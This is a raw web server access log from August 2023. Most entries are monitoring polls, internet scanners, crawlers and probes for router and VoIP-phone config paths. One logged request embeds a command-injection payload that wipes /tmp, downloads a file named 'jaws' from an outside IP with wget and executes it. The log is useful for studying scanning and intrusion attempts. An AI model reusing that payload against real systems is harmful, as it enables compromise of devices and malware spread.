212.91.246.72 - - [01/Aug/2023:10:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:10:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:52:05 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
185.180.143.18 - - [01/Aug/2023:10:52:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:10:52:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:52:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:52:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:52:37 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:52:39 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:52:47 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2023:10:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:53:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:53:18 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:53:20 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:53:24 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:27 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:45 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:53:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:53:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:53:58 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:00 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:00 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:07 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:54:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
212.91.246.72 - - [01/Aug/2023:10:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:54:16 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:19 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:54:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:38 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:54:40 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:55:11 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
212.91.246.72 - - [01/Aug/2023:10:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:55:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:55:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:55:43 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:55:45 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
212.91.246.72 - - [01/Aug/2023:10:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.40.56.4 - - [01/Aug/2023:10:56:29 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:56:29 +0200] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:56:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.40.56.4 - - [01/Aug/2023:10:56:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:57:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:57:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:57:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:57:02 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.40.56.4 - - [01/Aug/2023:10:57:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
212.91.246.72 - - [01/Aug/2023:10:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.77.127.183 - - [01/Aug/2023:10:57:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
168.205.38.39 - - [01/Aug/2023:10:57:50 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Aug/2023:10:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:10:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:02:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:06:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.225.124.27 - - [01/Aug/2023:11:07:05 +0200] "POST / HTTP/1.1" 400 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:11:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:08:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.43 - - [01/Aug/2023:11:08:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [01/Aug/2023:11:08:33 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [01/Aug/2023:11:08:33 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [01/Aug/2023:11:08:33 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.43 - - [01/Aug/2023:11:08:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:11:09:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.225.124.27 - - [01/Aug/2023:11:11:05 +0200] "POST / HTTP/1.1" 400 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:11:11:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.155 - - [01/Aug/2023:11:11:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [01/Aug/2023:11:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.225.124.27 - - [01/Aug/2023:11:13:23 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Aug/2023:11:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.111.236.86 - - [01/Aug/2023:11:15:43 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:43 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000028.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:44 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000068.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:45 +0200] "GET /yealink/cfg/y000000000000.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:51 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:52 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:53 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
95.111.236.86 - - [01/Aug/2023:11:15:53 +0200] "GET /yealink/cfg/y000000000044.cfg HTTP/1.1" 404 334 "-" "libwww-perl/6.72"
212.91.246.72 - - [01/Aug/2023:11:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.22 - - [01/Aug/2023:11:16:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.254 - - [01/Aug/2023:11:16:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Aug/2023:11:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.225.124.27 - - [01/Aug/2023:11:17:28 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
167.248.133.125 - - [01/Aug/2023:11:17:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.125 - - [01/Aug/2023:11:17:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.125 - - [01/Aug/2023:11:17:35 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.125 - - [01/Aug/2023:11:17:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Aug/2023:11:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:19:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.13 - - [01/Aug/2023:11:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.13 - - [01/Aug/2023:11:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.13 - - [01/Aug/2023:11:19:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.13 - - [01/Aug/2023:11:19:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Aug/2023:11:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:22:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:25:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.111.10.167 - - [01/Aug/2023:11:28:27 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Aug/2023:11:29:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.133 - - [01/Aug/2023:11:36:30 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
207.46.13.224 - - [01/Aug/2023:11:36:41 +0200] "GET /sitemap.xml.gz HTTP/1.1" 404 319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Aug/2023:11:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2023:11:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
